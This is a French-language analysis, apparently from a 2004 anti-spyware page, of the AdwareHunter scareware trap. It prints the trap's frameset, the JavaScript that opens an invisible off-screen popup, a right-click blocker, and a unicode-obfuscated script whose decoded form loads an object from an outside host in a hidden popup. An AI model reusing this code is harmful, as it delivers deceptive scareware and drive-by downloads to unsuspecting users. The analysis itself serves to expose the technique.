AdwareHunter ( Adware Hunter )

Utilise la technique du téléchargement silencieux (drive by download) conduit par des popup invisibles (ou des Web Bug) sur des sites affiliés et piégés, puis affiche aussitôt, quasiment en plein écran, une popup effrayante. Cette image est l'archétype des popup tentant de vous faire peur. Le Web Bug invisible est lui-même encapsulé dans un frame invisible exécutant quelques scripts additionnels, le frame visible ouvrant en pleine fenêtre sur le véritable site de microsoft, MSN.com.

Analyse de l'un des sites piégé :
L'un de ces sites piégés est http://www.browser-page.com/my_home.html. Le premier frame, dans le frameset ci-dessous, est invisible et va chercher http://www.browser-page.com/2top.html).

<frameset framespacing="0" border="0" frameborder="0" rows="21,1%">
<frame name="top" src="2top.html" marginwidth="0" marginheight="0" scrolling="no" target="_self" noresize>
<frame name="bottom" src="http://www.msn.com" marginwidth="0" marginheight="0" scrolling="auto" noresize>
<noframes>
<body>
</body>
</noframes>
</frameset>

Le frame caché exécute le script suivant dont la fonction est d'aller chercher une page html (qui est la popup ci-dessous) à http://www.adwarehunter.com/index/removaltool/Computer_Error.htm et de l'afficher par dessus la page du site MSN, 1 seconde après. Un son est joué et, simultanément, votre lecteur de cd-rom s'ouvre.

Nota : lors d'un nouveau test du 07.08.04 le script ne va plus chercher http://www.adwarehunter.com/index/removaltool/Computer_Error.htm mais http://www.spywareprotector.com/Computer_Error.htm.

<SCRIPT LANGUAGE="JavaScript">
<!-- Begin
closetime = 20; // Close window after __ number of seconds?
// 0 = do not close, anything else = number of seconds
function Start(URL, WIDTH, HEIGHT) {
windowprops = "left=5000,top=5000,width=" + WIDTH + ",height=" + HEIGHT;
// La position de la fenêtre est cachée (fenêtre invisible)
// Elle est affichée à partir du pixel 5000 en hauteur et du pixel 5000 en largeur soit à l'extérieur de l'écran
// Les résolutions d'écrans étant de 800*600 ou 1024*768, au maximum, 1600*1200, cette fenêtre ne sera jamais visible
preview = window.open(URL, "preview", windowprops);
if (closetime) setTimeout("preview.close();", closetime*1000);
}
function doPopup() {
url = "http://www.adwarehunter.com/index/removaltool/Computer_Error.htm";
width = 1; // Cette largeur de 1 pixel rend la pop-up invisible
height = 1; // Cette hauteur de 1 pixel rend la pop-up invisible
delay = 0; // Délais en seconde avant l'ouverture de la popup
timer = setTimeout("Start(url, width, height)", delay*1000); // Attente d'1 seconde (1.000 millièmes de sec.) afin de déjouer certains anti-popup primaires
}
// End -->
</script>
</head>
<body OnLoad="doPopup();" topmargin="0" leftmargin="0" bgcolor="#004E82">
<script language=JavaScript>
<!--
var message="";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")
// -->
</script>

Et voici la popup de fausse alerte qui s'affiche, bien effrayante. En gros, elle dit : Téléchargez tout de suite mon utilitaire sinon vous êtes mort !




Simultanément, le tirroir du cd-rom s'est ouvert. Le code pour ouvrir le cd-rom est un bête script Java, mais il est crypté :

<script type="text/javascript">document.write('\u003c\u0073\u0063\u0072\u0069\u0070 \u0074\u0020\u006c\u0061 \u006e\u0067\u0075\u0061\u0067\u0065\u003d\u006a\u0061\u0076\u0061\u0073\u0063 \u0072\u0069\u0070\u0074 \u003e\u000d\u000a\u0076\u0061\u0072\u0020\u006f\u0050\u006f\u0070\u0075\u0070 \u0020\u003d\u0020\u0077 \u0069\u006e\u0064\u006f\u0077\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0050 \u006f\u0070\u0075\u0070 \u0028\u0029\u003b\u000d\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e \u0020\u0073\u0068\u006f \u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u007b\u000d\u000a \u0009\u006f\u0050\u006f \u0070\u0075\u0070\u002e\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e \u0062\u006f\u0064\u0079 \u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020 \u0022\u003c\u006f\u0062 \u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0068\u0074\u0074 \u0070\u003a\u002f\u002f \u006f\u0062\u006a\u0065\u0063\u0074\u002e\u0070\u0061\u0073\u0073\u0074\u0068 \u0069\u0073\u006f\u006e \u002e\u0063\u006f\u006d\u002f\u0076\u0075\u0030\u0038\u0033\u0030\u0030\u0033 \u002f\u006f\u0062\u006a \u0065\u0063\u0074\u002d\u0063\u0030\u0030\u0031\u002e\u0063\u0067\u0069\u003e \u0022\u003b\u000d\u000a \u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0073\u0068\u006f\u0077\u0028 \u0030\u002c\u0030\u002c \u0031\u002c\u0031\u002c\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e \u0062\u006f\u0064\u0079 \u0029\u003b\u000d\u000a\u007d\u000d\u000a\u0073\u0068\u006f\u0077\u0050\u006f \u0070\u0075\u0070\u0028 \u0029\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e') </script>

Ce qui nous donne, une fois décrypté :

<script language=javascript>
var oPopup = window.createPopup();
function showPopup()
{
oPopup.document.body.innerHTML = "<object data=http://object.passthison.com/vu83003/object-c001.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
</script>

Le site et le produit semblent ne plus exister. Le site piégé existe toujours et, au 07.08.04, exploite exactement le même piège au profit de SpywareProtector.